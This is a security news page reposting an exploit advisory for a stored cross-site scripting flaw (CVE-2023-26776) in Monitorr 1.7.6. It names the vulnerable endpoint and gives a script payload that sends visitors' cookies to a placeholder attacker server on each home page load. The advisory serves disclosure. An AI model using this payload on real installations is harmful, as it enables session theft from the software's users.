Home Tools Exploits & CVE's Monitorr 1.7.6 Cross Site Scripting

Monitorr 1.7.6 Cross Site Scripting

April 6, 2023

444

Monitorr version 1.7.6 suffers from a cross site scripting vulnerability.

advisories | CVE-2023-26776

# Exploit Title: Monitorr v1.7.6 - Cross Site Scripting
# CVE: CVE-2023-26776
# Exploit Author: Achuth V P (retrymp3)
# Date: February 09, 2023
# Vendor Homepage: https://github.com/Monitorr/
# Software Link: https://github.com/Monitorr/Monitorr
# Tested on: Ubuntu
# Version: v1.7.6
# Exploit Description:  Cross Site Scripting vulnerability found in Monitorr v.1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file.

Attacker can create a service configuration at <base-url>/assets/php/post_receiver-services.php with the title of the service being something like; <script>document.location="<your-server>?cookie="document.cookie</script> or just <script>document.cookie</script>
The injected script tag is executed everytime the home page is loaded.

Monitorr 1.7.6 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

LockBit claims attack on Wichita as city struggles with payment issues,...

Cyber director sees potential for a new era in White House...

UK government urges caution over blaming China for Ministry of Defence...

POPULAR POSTS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

POPULAR CATEGORY

Exam Form Submission System 1.0 SQL Injection

Vehicle Service Management System 1.0 Shell Upload

FTPDMIN 0.96 Denial Of Service